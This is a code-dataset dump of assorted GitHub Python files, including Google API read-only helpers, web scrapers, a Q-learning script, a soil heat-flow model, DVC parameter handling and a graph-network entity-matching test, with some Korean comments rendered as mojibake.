seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
โ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
19329693229
|
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from google.oauth2.credentials import Credentials
from google.auth.transport.requests import Request
import os
# All scopes together
ALL_SCOPES = [
'https://www.googleapis.com/auth/contacts.readonly',
'https://www.googleapis.com/auth/calendar.readonly',
'https://www.googleapis.com/auth/gmail.readonly'
]
CREDENTIALS_FILE = 'env/token.json'
def get_credentials(scopes):
creds = None
# Load credentials from the file if it exists
if os.path.exists(CREDENTIALS_FILE):
creds = Credentials.from_authorized_user_file(CREDENTIALS_FILE, scopes)
# Refresh or obtain new credentials
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request()) # Use `Request()` as the required argument for `refresh()`
else:
flow = InstalledAppFlow.from_client_secrets_file('env/oauth2_credentials.json', scopes)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(CREDENTIALS_FILE, 'w') as token:
token.write(creds.to_json())
return creds
# Build the service using credentials
def get_authenticated_service(api, version, creds):
return build(api, version, credentials=creds)
# Fetch contacts
def get_contacts(creds):
service = get_authenticated_service('people', 'v1', creds)
results = service.people().connections().list(
resourceName='people/me',
personFields='names,emailAddresses'
).execute()
print("Data type of get_contacts results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
return results # Add this line
# Fetch calendar events
def get_calendar_events(creds):
service = get_authenticated_service('calendar', 'v3', creds)
results = service.events().list(calendarId='primary').execute()
print("Data type of get_calendar_events results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
return results # Add this line
# Fetch emails
def get_emails(creds):
service = get_authenticated_service('gmail', 'v1', creds)
results = service.users().messages().list(userId='me', maxResults=10).execute()
messages = results.get('messages', [])
full_messages = [] # List to hold the full message details
for message in messages:
msg = service.users().messages().get(userId='me', id=message['id']).execute()
full_messages.append(msg)
return full_messages
if __name__ == "__main__":
creds = get_credentials(ALL_SCOPES)
get_contacts(creds)
get_calendar_events(creds)
get_emails(creds)
|
clarkdever/gcal-gcontacts-sync
|
google_api_utils.py
|
google_api_utils.py
|
py
| 2,803
|
python
|
en
|
code
| 0
|
github-code
|
6
|
19969055167
|
"""
This helps in finding the means and standards of the images to normalize before training.
To run
python3 calculate_means_std.py -i path/to/image/folder/
"""
import argparse
import subprocess
import yaml
import os
import sys
sys.path.remove("/opt/ros/kinetic/lib/python2.7/dist-packages")
import cv2
import numpy as np
def is_image(filename):
return any(filename.endswith(ext) for ext in ['.jpg', '.png'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--image', '-i',
type=str,
required=True,
default=None,
help='Directory to get the images from. If not passed, do from scratch!'
)
FLAGS, unparsed = parser.parse_known_args()
# print summary of what we will do
print("----------")
print("INTERFACE:")
#
print("image dir", FLAGS.image)
print("----------\n")
print("----------\n")
#
# create list of images and examine their pixel values
filenames = [os.path.join(dp, f) for dp, dn, fn in os.walk(
os.path.expanduser(FLAGS.image)) for f in fn if is_image(f)]
# examine individually pixel values
counter = 0.0
pix_val = np.zeros(3, dtype=np.float)
for filename in filenames:
# analize
print("Accumulating mean", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
cv_img = cv_img.astype(np.float) / 255.0
# count pixels and add them to counter
h, w, d = cv_img.shape
counter += h * w
# sum to moving pix value counter in each channel
pix_val += np.sum(cv_img, (0, 1))
# calculate means
means = (pix_val / counter)
# means
print("means(rgb): ", means)
# pass again and calculate variance
pix_var = np.zeros(3, dtype=np.float)
for filename in filenames:
# analizel
print("Accumulating variance", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
cv_img = cv_img.astype(np.float) / 255.0
# sum to moving pix value counter in each channel
pix_var += np.sum(np.square(cv_img - means), (0, 1))
# calculate the standard deviations
stds = np.sqrt(pix_var / counter)
print("stds(rgb): ", stds)
# finalize by printing both
print("*" * 80)
print("means(rgb): ", means)
print("stds(rgb): ", stds)
print("*" * 80)
|
vijaysamula/Building_floor_counter
|
calculate_means_stds.py
|
calculate_means_stds.py
|
py
| 2,438
|
python
|
en
|
code
| 0
|
github-code
|
6
|
13454184469
|
"""
words list๊ฐ ๋งํฌ๋ง ์๊ณ , ๊ธ์ ๋ฐ์ดํฐ๊ฐ ์์. ๊ธ์ ๋ฆฌ์คํธ๋ฅผ ๋ฐ์์ค๊ธฐ ์ํ ํ์ผ
"""
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
class Get_chndic_data:
def __init__(self, link):
self.link = link
self.get_data = []
def beautiful_soup(self, link):
"""
Beautiful Soup Type์ ๊ฐ์ฒด๋ฅผ return
return๊ฐ์ ๋ค์๊ณผ ๊ฐ์ ๋ฉ์๋ ๊ฐ๋ฅ
data = soup.find('div', id='container').find('div', class_='section_hsk')
:param link: https://zh.dict.naver.com/ ๋ค์ ๋ค์ด๊ฐ {letter_link} ์ฃผ์
:return: row ๋ฐ์ดํฐ
"""
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('headless')
chrome_options.add_argument('window-size=1920x1080')
chrome_options.add_argument("disable-gpu")
# https://beomi.github.io/2017/09/28/HowToMakeWebCrawler-Headless-Chrome/
# driver = webdriver.Chrome("D:/dev/chromedriver.exe", chrome_options=chrome_options) # ์ง์์ chromedriver ๊ฒฝ๋ก
driver = webdriver.Chrome("C:/Users/user/Downloads/chromedriver.exe", chrome_options=chrome_options)
# ํ์์์ chromedriver ๊ฒฝ๋ก
url = f'https://zh.dict.naver.com/{link}'
driver.get(url)
driver.minimize_window()
content = driver.page_source.encode('utf-8').strip()
soup = BeautifulSoup(content, "html.parser")
driver.close()
return soup
def find_letter_inf(self):
"""
๊ธ์ link๋ฅผ ์ด์ฉํด ๊ธ์์ ๊ธ์ ๋ป, ๋ณ์, ๋จ์ด์ผ ๊ฒฝ์ฐ ๊ตฌ์ฑ ๊ธ์์ ๊ตฌ์ฑ ๊ธ์ ๋งํฌ๋ฅผ ๋ฐ์์ด
:return: ์ ์๋ฃ๋ก ๊ตฌ์ฑ๋ list
"""
# ๋ณ์ ์ถ๊ฐํด์ผ ํจ.
soup = self.beautiful_soup(self.link)
letter = soup.find('div', id='container').find('div', class_="section section_entry _section_entry") \
.find('div', class_="entry_title _guide_lang").find('strong', class_='word').text
return letter
temp_df = pd.read_csv('../csv/hsk_words_listed.csv', encoding='UTF-8')
hsk_words_link = temp_df.iloc[:, 1]
index = 500
get_data_list = []
########################################## ํ์ผ๋ช
๋ณํ ##################################
for i in range(3000, 3100):
while True:
try:
get_data = Get_chndic_data(hsk_words_link[i])
get_data_list.append(get_data.find_letter_inf())
df = pd.DataFrame(get_data_list)
print(df.tail())
df.to_csv(f'../csv/letters_list{3000}.csv')
break
except AttributeError:
print('try again')
continue
|
i-hs/chn_words_crawling
|
make_database/words_list.py
|
words_list.py
|
py
| 2,691
|
python
|
ko
|
code
| 0
|
github-code
|
6
|
22126010030
|
import math
import random
# read data from file
def getData(fn):
# get data
file = open(fn, 'r')
read = file.readlines()
file.close
states = int(read[0]) # number of states
rewards = [] # reward data (also state data)
moves = [] # move data
for i in range(1, len(read)):
row = read[i].split('\n')[0].split(' ')
# append
if i <= states:
row[1] = int(row[1])
rewards.append(row)
else:
row.append(0)
moves.append(row)
return (rewards, moves)
# lookup table -> return index
def lookup(table, coln, value):
for i in range(len(table)):
if table[i][coln] == value: return i
return -1
# Q Learning
def QLearning_(rewards, moves, state, doRandom, times, lastModifiedTimes):
# print
symbol = rewards[state][0] # symbol of state
print('')
print('symbol of state: ' + symbol)
for i in range(len(moves)): print(moves[i])
# find all possible actions
nextstate = []
for i in range(len(moves)):
if moves[i][0] == symbol: nextstate.append(moves[i])
print('possible next moves: ' + str(nextstate))
# decide next action
nextActionIndex = -1 # index of next action
# RANDOM
if random.random() < doRandom:
print('decide RANDOM')
next_ = random.randint(0, len(nextstate)-1)
state = lookup(rewards, 0, nextstate[next_][1]) # update state
nextActionIndex = next_
# BEST state
else:
print('decide BEST')
bestVal = 0
bestIndex = -1
for i in range(len(nextstate)):
if nextstate[i][2] > bestVal:
bestVal = nextstate[i][2]
bestIndex = i
# best of next state (same value as best choice)
# choose best next state randomly
bestNextState = []
for i in range(len(nextstate)):
if nextstate[i][2] == bestVal:
bestNextState.append(nextstate[i])
selectBestNext = random.randint(0, len(bestNextState)-1)
state = lookup(rewards, 0, bestNextState[selectBestNext][1]) # update state
nextActionIndex = i
# get immediate reward r(s, a)
r = rewards[state][1]
# find new state s' -> y*max(a')(Q(s', a'))
symbol = rewards[state][0]
maxReward = 0 # next action that has max reward
for i in range(len(moves)):
if moves[i][0] == symbol:
if moves[i][2] > maxReward: maxReward = moves[i][2]
# update state
value = r + 0.5 * maxReward
if nextstate[nextActionIndex][2] != value:
lastModifiedTimes = times
nextstate[nextActionIndex][2] = value
print('update ' + str(nextstate[nextActionIndex][0]) + ' to '
+ str(nextstate[nextActionIndex][1]) + ': ' + str(value))
print('symbol of state : ' + symbol)
print('immediate reward: ' + str(r))
print('max reward : ' + str(maxReward))
return (rewards, moves, state, times, lastModifiedTimes)
# do Q Learning
def QLearning(rewards, moves):
# print
print('Rewards:')
for i in range(len(rewards)): print(rewards[i])
times = 0
lastModifiedTimes = 0 # times when action table was lastly changed
while 1:
# round info
times += 1
doRandom = 10/(times+10) # probability of searching randomly
print('')
print('----------------<<<< ROUND ' + str(times) + ' >>>>----------------')
# do Q learning until the last state
state = 0
while state != len(rewards)-1:
(rewards, moves, state, times, lastModifiedTimes) = QLearning_(rewards, moves, state, doRandom, times, lastModifiedTimes)
# break when converged
if lastModifiedTimes * 2 + 10 < times: break
if __name__ == '__main__':
(rewards, moves) = getData('QLearning.txt')
QLearning(rewards, moves)
|
WannaBeSuperteur/AI
|
QLearning.py
|
QLearning.py
|
py
| 4,032
|
python
|
en
|
code
| 0
|
github-code
|
6
|
33708620212
|
import os
from google.cloud import storage
class GoogleStorageLoader():
def __init__(self) -> None:
"""Start Google Cloud clint - could be used for uploading to storage
"""
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "../content/key-bucket.json"
self.client = storage.Client()
def upload_to_bucket(self, bucket_name, source_file, destination):
"""uploads file to the bucket
Args:
bucket_name (str): _description_
source_file (str): _description_
destination (str): _description_
"""
bucket = self.client.bucket(bucket_name)
blob = bucket.blob(destination)
blob.upload_from_filename(source_file)
|
IhorLuk/reddit_api_data_ingestion
|
src/storage.py
|
storage.py
|
py
| 724
|
python
|
en
|
code
| 0
|
github-code
|
6
|
41054313506
|
# coding: utf-8
# # Heat Diffusion in Soils
#
# This Jupyter Notebook gives an example how to implement a 1D heat diffusion model in Python.
#
# First we need to import the packages which we will be using:
#
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import CoupledHeatWaterFlowTHe as cfun
import MyTicToc as mt
sns.set()
## Main
# In[0:] Domain & Soil properties
nIN = 51
# soil profile until 15 meters depth
zIN = np.linspace(-2.0, 0, num=nIN).reshape(nIN, 1)
# nIN = np.shape(zIN)[0]
zN = np.zeros(nIN - 1).reshape(nIN - 1, 1)
zN[0, 0] = zIN[0, 0]
zN[1:nIN - 2, 0] = (zIN[1:nIN - 2, 0] + zIN[2:nIN - 1, 0]) / 2
zN[nIN - 2, 0] = zIN[nIN - 1]
nN = np.shape(zN)[0]
ii = np.arange(0, nN - 1)
dzN = (zN[ii + 1, 0] - zN[ii, 0]).reshape(nN - 1, 1)
dzIN = (zIN[1:, 0] - zIN[0:-1, 0]).reshape(nIN - 1, 1)
# collect model dimensions in a pandas series: mDim
mDim = {'zN' : zN,
'zIN' : zIN,
'dzN' : dzN,
'dzIN' : dzIN,
'nN' : nN,
'nIN' : nIN
}
mDim = pd.Series(mDim)
# ## Definition of material properties
# In this section of the code we define the material properties
# Soil Properties
# [J/(m3 K)] volumetric heat capacity of soil solids
zetaSol = 2.235e6
# [J/(m3 K)] volumetric heat capacity of water (Fredlund 2006)
zetaWat = 4.154e6
# rhoW = 1000 # [kg/m3] density of water
rhoS = 2650 # [kg/m3] density of solid phase
rhoB = 1700 # %[kg/m3] dry bulk density of soil
n = 1 - rhoB / rhoS # [-] porosity of soil = saturated water content.
qCont = 0.75 # quartz content
# collect soil parameters in a pandas Series: sPar
sPar = {'vGA': np.ones(np.shape(zN)) * 1 / 2.0, # alpha[1/m]
'vGN': np.ones(np.shape(zN)) * 2.0, # n[-]
'vGM': np.ones(np.shape(zN)) * (1 - 1 / 2.0), # m = 1-1/n[-]
'thS': np.ones(np.shape(zN)) * 0.4, # saturated water content
'thR': np.ones(np.shape(zN)) * 0.03, # residual water content
'KSat': np.ones(np.shape(zN)) * 0.25, # [m/day]
'vGE': 0.5, # power factor for Mualem-van Genuchten
'Cv': 1.0e-8, # compressibility of compact sand [1/Pa]
'viscRef': cfun.ViscosityWaterT(283.15),
'qCont': qCont, # quartz content
}
sPar = pd.Series(sPar)
# In[1:] Definition of the Boundary Parameters
# Read meteodata
meteo_data = pd.read_excel('WieringermeerData_Meteo.xlsx')
meteo_data['num_date'] = meteo_data['datetime'].astype(np.int64)/(1e9*3600*24)
meteo_data.set_index('datetime',inplace=True)
# set simulation time to numeric dates from boudary data...
t_range = meteo_data['num_date'][:-1]
taxis = meteo_data.index[:-1]
# collect boundary parameters in a named tuple boundpar...
def BndTTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
bndT = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
topT = bPar.meteo_data['temp'].iloc[md_ind].values
bndT[ii] = 273.15 + topT
return bndT
def BndqWatTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
qBnd = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
rf = bPar.meteo_data['rain_station'].iloc[md_ind].values
qBnd[ii] = -rf
return qBnd
bPar = {'topBndFuncHeat': BndTTop,
'meteo_data': meteo_data,
'topCond': 'Robin',
'lambdaRobTop': 1e9,
'lambdaRobBot': 0,
'TBndBot': 273.15 + 10,
'topBndFuncWat': BndqWatTop, #topBndFuncWat(t,bPar)
'bottomTypeWat': 'Robin', # Robin condition or Gravity condition
'kRobBotWat': 0.05, # Robin resistance term for bottom
'hwBotBnd': 1.0, # pressure head at lower boundary
}
bPar = pd.Series(bPar)
# In[3:] Define Initial Conditions
zRef = -1.0 # depth of water table
hwIni = zRef - zN
TIni = np.ones(np.shape(zN)) * (10.0 + 273.15) # K
sVecIni = np.concatenate([hwIni, TIni], axis=0)
# Time Discretization
tOut = np.linspace(t_range[0],t_range[365],365*5)
#tplot = taxis[0:50]
nOut = np.shape(tOut)[0]
nOut = len(tOut)
# tOut = np.sort(np.hstack((tOut1, bTime))) # time
# copy initial vector to hw0. Apply squeeze to compress it to one dimension
mt.tic()
int_result = cfun.IntegrateCHWF(tOut, sVecIni, sPar, mDim, bPar)
mt.toc()
hWSim = int_result.y[0:nN]
TSim = int_result.y[nN:2*nN]
thSim = cfun.thFun(hWSim,sPar)
qWSim = cfun.WatFlux(tOut,hWSim,TSim,sPar,mDim,bPar)
qHSim = cfun.HeatFlux(tOut, TSim, hWSim, sPar, mDim, bPar)
#mt.tic()
#TOutPic, hwOutPic = himp.HalfImplicitPicar(tOut2, hw0, T0, sPar, mDim, bPar, tPar)
#mt.toc()
sns.set()
plt.close('all')
fig1, ax1 = plt.subplots(figsize=(7, 4))
ii = np.arange(nN-1, 0, -10)
ax1.plot(tOut, TSim[ii,].T, '-')
ax1.set_title('Temperature (ODE)')
ax1.set_xlabel('time (days)')
ax1.set_ylabel('temperature [K]')
ax1.legend(zN[ii])
fig2, ax2 = plt.subplots(figsize=(7, 7))
jj = np.arange(0, nOut)
ax2.plot(TSim[:, jj], zN, '-')
ax2.set_title('Temperature vs. depth (ODE)')
ax2.set_ylabel('depth [m]')
ax2.set_xlabel('temperature [K]')
fig3, ax3 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax3.plot(tOut, qHSim[ii,:].T, '-')
ax3.set_title('Heat Flux vs. depth (ODE)')
ax3.set_ylabel('depth [m]')
ax3.set_xlabel('temperature [J/m2]')
ax3.legend(zN[ii])
fig4, ax4 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 20th layer.
ax4.plot(tOut, hWSim[ii,:].T, '-')
ax4.set_ylabel('pressure head [m]')
ax4.set_xlabel('time [d]')
#plot pressure head as a function of depth. Here we plot every time step
fig5, ax5 = plt.subplots(figsize=(7, 7))
ax5.plot(hWSim, zN, '-')
ax5.grid(b=True)
ax5.set_xlabel('pressure head [m]')
ax5.set_ylabel('depth [m]')
# plt.savefig('myfig.png')
fig6, ax6 = plt.subplots(figsize=(7, 7))
ax6.plot(thSim, zN, '-')
ax6.grid(b=True)
ax6.set_xlabel('water content [-]')
ax6.set_ylabel('depth [m]')
fig7, ax7 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 20th layer.
ax7.plot(tOut, thSim[ii,:].T, '-')
ax7.set_ylabel('water content [-]')
ax7.set_xlabel('time [d]')
ax7.legend(zN[ii])
fig8, ax8 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax8.plot(tOut, qWSim[ii,:].T, '-')
ax8.set_title('Water Flux ')
ax8.set_ylabel('depth [m]')
ax8.set_xlabel('water flow [m/d]')
ax8.legend(zN[ii])
fig1.savefig('./figures_scenarios/3_figure1.png')
fig2.savefig('./figures_scenarios/3_figure2.png')
fig3.savefig('./figures_scenarios/3_figure3.png')
fig4.savefig('./figures_scenarios/3_figure4.png')
fig5.savefig('./figures_scenarios/3_figure5.png')
fig6.savefig('./figures_scenarios/3_figure6.png')
fig7.savefig('./figures_scenarios/3_figure7.png')
fig8.savefig('./figures_scenarios/3_figure8.png')
# import shelve
# filename='/tmp/shelve.out'
# my_shelf = shelve.open(filename,'n') # 'n' for new
# for key in dir():
# try:
# my_shelf[key] = globals()[key]
# except TypeError:
# #
# # __builtins__, my_shelf, and imported modules can not be shelved.
# #
# print('ERROR shelving: {0}'.format(key))
# my_shelf.close()
|
solomelittle/EL-Individual-Assignment
|
03_ScriptCH_WieringermeerBoundary.py
|
03_ScriptCH_WieringermeerBoundary.py
|
py
| 7,445
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3477283820
|
import logging
import os
import typing
from collections import defaultdict
from typing import Dict
import dpath.util
from voluptuous import Any
from dvc.exceptions import DvcException
from dvc.utils.serialize import ParseError, load_path
from dvc_data.hashfile.hash_info import HashInfo
from .base import Dependency
logger = logging.getLogger(__name__)
class MissingParamsError(DvcException):
pass
class MissingParamsFile(DvcException):
pass
class ParamsIsADirectoryError(DvcException):
pass
class BadParamFileError(DvcException):
pass
class ParamsDependency(Dependency):
PARAM_PARAMS = "params"
PARAM_SCHEMA = {PARAM_PARAMS: Any(dict, list, None)}
DEFAULT_PARAMS_FILE = "params.yaml"
def __init__(self, stage, path, params=None, repo=None):
self.params = list(params) if params else []
info = (
{self.PARAM_PARAMS: params} if isinstance(params, dict) else None
)
repo = repo or stage.repo
path = path or os.path.join(repo.root_dir, self.DEFAULT_PARAMS_FILE)
super().__init__(stage, path, info=info, repo=repo)
def dumpd(self):
ret = super().dumpd()
if not self.hash_info:
ret[self.PARAM_PARAMS] = self.params or {}
return ret
def fill_values(self, values=None):
"""Load params values dynamically."""
if values is None:
return
info = {}
if not self.params:
info.update(values)
for param in self.params:
if param in values:
info[param] = values[param]
self.hash_info = HashInfo(self.PARAM_PARAMS, info)
def read_params(
self, flatten: bool = True, **kwargs: typing.Any
) -> Dict[str, typing.Any]:
try:
config = self.read_file()
except MissingParamsFile:
config = {}
if not self.params:
return config
ret = {}
if flatten:
for param in self.params:
try:
ret[param] = dpath.util.get(config, param, separator=".")
except KeyError:
continue
return ret
from dpath.util import merge
for param in self.params:
merge(
ret,
dpath.util.search(config, param, separator="."),
separator=".",
)
return ret
def workspace_status(self):
if not self.exists:
return {str(self): "deleted"}
if self.hash_info.value is None:
return {str(self): "new"}
from funcy import ldistinct
status = defaultdict(dict)
info = self.hash_info.value if self.hash_info else {}
actual = self.read_params()
# NOTE: we want to preserve the order of params as specified in the
# status. In case of tracking the whole file, the order is top-level
# keys in the file and then the keys in the `info` from `dvc.lock`
# (which are alphabetically sorted).
params = self.params or ldistinct([*actual.keys(), *info.keys()])
for param in params:
if param not in actual:
st = "deleted"
elif param not in info:
st = "new"
elif actual[param] != info[param]:
st = "modified"
else:
assert actual[param] == info[param]
continue
status[str(self)][param] = st
return status
def status(self):
return self.workspace_status()
def validate_filepath(self):
if not self.exists:
raise MissingParamsFile(f"Parameters file '{self}' does not exist")
if self.isdir():
raise ParamsIsADirectoryError(
f"'{self}' is a directory, expected a parameters file"
)
def read_file(self):
self.validate_filepath()
try:
return load_path(self.fs_path, self.repo.fs)
except ParseError as exc:
raise BadParamFileError(
f"Unable to read parameters from '{self}'"
) from exc
def get_hash(self):
info = self.read_params()
missing_params = set(self.params) - set(info.keys())
if missing_params:
raise MissingParamsError(
"Parameters '{}' are missing from '{}'.".format(
", ".join(missing_params), self
)
)
return HashInfo(self.PARAM_PARAMS, info)
def save(self):
if not self.exists:
raise self.DoesNotExistError(self)
if not self.isfile and not self.isdir:
raise self.IsNotFileOrDirError(self)
self.ignore()
self.hash_info = self.get_hash()
|
gshanko125298/Prompt-Engineering-In-context-learning-with-GPT-3-and-LLMs
|
myenve/Lib/site-packages/dvc/dependency/param.py
|
param.py
|
py
| 4,814
|
python
|
en
|
code
| 3
|
github-code
|
6
|
42072257921
|
#!/usr/bin/env python
# coding: utf-8
# In[36]:
import requests
from bs4 import BeautifulSoup
import pandas
list1=[]
for page in range(0,30,10):
r = requests.get("http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s="+str(page)+".html", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c= r.content
soup=BeautifulSoup(c,"html.parser")
all=soup.find_all("div",{"class":"propertyRow"})
x=all[0].find("h4",{"class":"propPrice"}).text
for item in all:
d={}
d["Address"]=item.find_all("span",{"class":"propAddressCollapse"})[0].text
try:
d["Locality"]=item.find_all("span",{"class":"propAddressCollapse"})[1].text
except:
d["Locality"]=None
d["Price"]=item.find("h4",{"class":"propPrice"}).text.replace("\n","").strip()
try:
d["Beds"]=item.find("span",{"class":"infoBed"}).find("b").text
except:
d["Beds"]=None
try:
d["Area"]=item.find("span",{"class":"infoSqFt"}).find("b").text
except:
d["Area"]=None
try:
d["Full Baths"]=item.find("span",{"class":"infoValueFullBath"}).find("b").text
except:
d["Full Baths"]=None
try:
d["Half Baths"]=item.find("span",{"class":"infoValueHalfBath"}).find("b").text
except:
d["Half Baths"]=None
for column_group in item.find_all("div",{"class":"columnGroup"}):
for fg , fn in zip(column_group.find_all("span",{"class":"featureGroup"}),column_group.find_all("span",{"class":"featureName"})):
if "Lot Size" in fg.text :
d["Lot Size"]=fn.text
list1.append(d)
df=pandas.DataFrame(list1)
df.to_csv("output.csv")
|
shivangijain827/python-projects
|
web - scraper/main.py
|
main.py
|
py
| 1,883
|
python
|
en
|
code
| 0
|
github-code
|
6
|
74099804029
|
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pandas as pd
import argparse
from dataset import collate_fn, MergedMatchingDataset
from torch.utils.data import DataLoader
from EmbedModel import EmbedModel
from GCN import gcn
from logger import set_logger
from utils import _read_csv, accuracy
def fetch_edge(batch):
edges = []
types = []
for ex in batch:
type = ex["type"]
center_id = ex["center"][0]
neighbors = []
if "neighbors_mask" in ex:
for i, n in enumerate(ex["neighbors"]):
if ex["neighbors_mask"][i] == 0:
continue
neighbors.append(n)
else:
neighbors = ex["neighbors"]
if type == 'l':
edges += [[center_id, n[0]] for n in neighbors]
types += [0] * len(neighbors)
elif type == 'r':
edges += [[n[0], center_id] for n in neighbors]
types += [1] * len(neighbors)
else:
raise NotImplementedError
return edges, types
def calculate_f1(edges, scores, labels, types, score_type='left'):
score_dict={}
for i, edge in enumerate(edges):
score = scores[i]
label = labels[i]
e = tuple(edge)
if e in score_dict:
assert score_dict[e][1] == label
if score_type == 'max':
score_dict[e] = (max(score_dict[e][0],score),label)
elif score_type == 'mean':
score_dict[e] = ((score_dict[e][0] + score) / 2.0, label)
elif score_type == 'min':
score_dict[e] = (min(score_dict[e][0], score), label)
else:
raise NotImplementedError
else:
score_dict[e] = (score,label)
score_label = score_dict.values()
scores = np.asarray([i[0] for i in score_label])
label = np.asarray([i[1] for i in score_label])
pred = (scores > 0.5).astype('int')
TP = np.sum((pred == 1) * (label == 1))
TN = np.sum((pred == 0) * (label == 0))
FP = np.sum((pred == 1) * (label == 0))
FN = np.sum((pred == 0) * (label == 1))
acc = (TP + TN) * 1.0 / (TP + TN + FN + FP)
if TP == 0:
p = r = f1 =0.0
else:
p = TP * 1.0 / (TP + FP)
r = TP * 1.0 / (TP + FN)
f1 = 2 * p * r / (p + r)
return p, r, f1, acc, score_dict
def test(iter,logger,model,embed_model,crit,test_step=None,tf_logger=None,score_type='mean', prefix='Test'):
model.eval()
embed_model.eval()
edges = []
scores = []
labels = []
types = []
for j, batch in enumerate(iter):
with torch.no_grad():
edge,type = fetch_edge(batch)
feature, A, label, masks = embed_model(batch)
masks = masks.view(-1)
label = label.view(-1)[masks == 1].long()
pred = model(feature, A)
pred = pred[masks == 1]
loss = crit(pred, label)
pred = F.softmax(pred, dim=1)
p, r, acc = accuracy(pred, label)
logger.info(
'{}\t[{:d}/{:d}]\tLoss {:.3f}\tAccuracy {:.3f}\tPrecison {:.3f}\tRecall {:.3f}'.format(prefix,j+1,len(iter),loss,acc,
p, r))
assert pred.shape[0] == label.shape[0]
scores += pred[:,1].detach().cpu().numpy().tolist()
edges += edge
labels += label.detach().cpu().numpy().tolist()
types += type
edges = np.asarray(edges)
scores = np.asarray(scores)
labels = np.asarray(labels)
types = np.asarray(types)
if not isinstance(score_type,list):
score_type = [score_type]
f1s = []
for t in score_type:
p, r, f1, acc, score_dict = calculate_f1(edges, scores, labels, types, score_type=t.lower())
f1s.append(f1)
logger.info('{}\t{}\tPrecison {:.3f}\tRecall {:.3f}\tF1-score {:.3f}\tAccuracy {:.3f}'.format(prefix, t, p, r, f1, acc))
if tf_logger:
tf_logger.add_scalar('{}/{}/Precision'.format(prefix, t), p, test_step)
tf_logger.add_scalar('{}/{}/Recall'.format(prefix, t), r, test_step)
tf_logger.add_scalar('{}/{}/f1Score'.format(prefix, t), f1, test_step)
tf_logger.add_scalar('{}/{}/Accuracy'.format(prefix, t), acc, test_step)
return f1s
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# misc
working_dir = osp.dirname(osp.abspath(__file__))
parser.add_argument('--seed', default=1, type=int)
parser.add_argument('--score_type', type=str, nargs='+')
# Test args
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--tableA_path', type=str)
parser.add_argument('--tableB_path', type=str)
parser.add_argument('--train_path', type=str)
parser.add_argument('--test_path', type=str)
parser.add_argument('--val_path', type=str)
parser.add_argument('--checkpoint_path', type=str)
# Device
parser.add_argument('--gpu', type=int, default=[0], nargs='+')
# Model
parser.add_argument('--gcn_layer', default=1, type=int)
args = parser.parse_args()
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
tableA = _read_csv(args.tableA_path)
tableB = _read_csv(args.tableB_path)
useful_field_num = len(tableA.columns) - 1
gcn_dim = 768
test_dataset = MergedMatchingDataset(args.test_path, tableA, tableB, other_path=[args.train_path, args.val_path])
test_iter = DataLoader(test_dataset, batch_size=args.batch_size, collate_fn=collate_fn, shuffle=False)
embedmodel = EmbedModel(useful_field_num=useful_field_num,device=args.gpu)
model = gcn(dims=[gcn_dim]*(args.gcn_layer + 1))
criterion = nn.CrossEntropyLoss().to(embedmodel.device)
logger = set_logger()
if args.checkpoint_path:
checkpoint = torch.load(args.checkpoint_path)
if len(args.gpu) == 1:
new_state_dict = {k.replace('module.', ''): v for k, v in checkpoint["embed_model"].items()}
embedmodel.load_state_dict(new_state_dict)
else:
embedmodel.load_state_dict(checkpoint["embed_model"])
model.load_state_dict(checkpoint["model"])
test_type = [checkpoint["type"]]
logger.info("Test Type:\t{}".format(checkpoint["type"]))
else:
test_type = args.test_type
embedmodel = embedmodel.to(embedmodel.device)
model = model.to(embedmodel.device)
test(iter=test_iter, logger=logger, model=model, embed_model=embedmodel, crit=criterion, score_type=test_type)
|
ChenRunjin/GNEM
|
test.py
|
test.py
|
py
| 6,754
|
python
|
en
|
code
| 5
|
github-code
|
6
|
41254027126
|
from copy import copy, deepcopy
from itertools import izip
from burrahobbit.util import all
SENTINEL = object()
SHIFT = 5
BMAP = (1 << SHIFT) - 1
BRANCH = 2 ** SHIFT
